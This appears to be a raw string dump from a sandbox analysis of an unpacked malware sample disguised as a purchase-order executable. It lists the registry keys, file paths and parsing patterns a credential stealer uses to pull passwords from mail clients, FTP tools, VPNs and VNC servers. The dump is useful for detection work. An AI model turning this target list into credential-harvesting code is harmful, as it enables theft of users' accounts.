Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: autofill
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ClawsMail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Claws-mail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \clawsrc
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \clawsrc
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: passkey0
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \accountrc
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: smtp_server
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: address
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: account
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \passwordstorerc
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: {(.),(.)}(.*)
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Flock Browser
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Flock\Browser\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: signons3.txt
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: DynDns
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: username=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: password=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: https://account.dyn.com/
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: t6KzXhCh
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: global
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: accounts
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: account.
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: username
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: account.
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: name
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Psi\profiles
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Psi+\profiles
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: OpenVPN
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: username
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: auth-data
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: entropy
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: USERPROFILE
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \OpenVPN\config\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: remote
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: remote
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: NordVPN
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: NordVPN
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: NordVpn.exe*
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: user.config
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: //setting[@name='Username']/value
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: NordVPN
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: %ProgramW6432%
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Private Internet Access\data
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Private Internet Access\data
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \account.json
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ."username":"(.?)"
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ."password":"(.?)"
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: privateinternetaccess.com
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: FileZilla
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <Server>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <Host>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <Host>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </Host>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <Port>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </Port>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <User>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <User>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </User>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </Pass>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <Pass>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </Pass>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: CoreFTP
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: User
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Host
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Port
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: hdfzpysvpzimorhk
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: WinSCP
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: HostName
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: UserName
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: PublicKeyFile
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: PortNumber
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: WinSCP
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ABCDEF
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Flash FXP
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: port
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: user
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: pass
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: quick.dat
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Sites.dat
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: FTP Navigator
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SystemDrive
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Server
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: No Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: User
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SmartFTP
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: APPDATA
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: WS_FTP
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: appdata
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: HOST
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: PWD=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: PWD=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: FtpCommander
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SystemDrive
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SystemDrive
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SystemDrive
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \cftp\Ftplist.txt
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ;Password=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ;User=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ;Server=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ;Port=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ;Port=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ;Password=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ;User=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ;Anonymous=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: FTPGetter
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \FTPGetter\servers.xml
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <server>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <server_ip>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <server_ip>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </server_ip>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <server_port>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </server_port>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </server_user_name>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: </server_user_password>
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: FTPGetter
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: The Bat!
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: appdata
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \The Bat!
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Becky!
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: DataDir
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Folder.lst
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Mailbox.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Account
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: PassWd
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Account
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SMTPServer
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Account
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: MailAddress
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Becky!
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Outlook
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Email
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: IMAP Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: POP3 Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: HTTP Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SMTP Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Email
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Email
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Email
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: IMAP Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: POP3 Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: HTTP Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SMTP Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Server
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Windows Mail App
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Email
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Server
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SchemaId
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: pResourceElement
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: pPackageSid
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: syncpassword
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: mailoutgoing
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: FoxMail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Executable
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: FoxmailPath
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Storage\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Storage\
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \mail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \mail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Account.stg
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Account.stg
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: POP3Host
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SMTPHost
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: IncomingServer
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Account
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: MailAddress
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: POP3Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Opera Mail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: opera:
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: PocoMail
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: appdata
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Pocomail\accounts.ini
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Email
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: POPPass
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SMTPPass
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SMTP
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: eM Client
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: eM Client\accounts.dat
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: eM Client
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Accounts
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: "Username":"
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: "Secret":"
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: "ProviderName":"
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: o6806642kbM7c5
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Mailbird
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SenderIdentities
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Accounts
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Server_Host
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Accounts
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Email
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Username
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: EncryptedPassword
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Mailbird
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\ORL\WinVNC3
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: TightVNC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: TightVNC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: PasswordViewOnly
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: TightVNC ControlPassword
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ControlPassword
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: TigerVNC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Software\TigerVNC\Server
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: Password
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: UltraVNC
Source: 0.2.PO54782322024.exe.17f15f43b08.3.raw.unpack	String decryptor: ProgramFiles(x86)
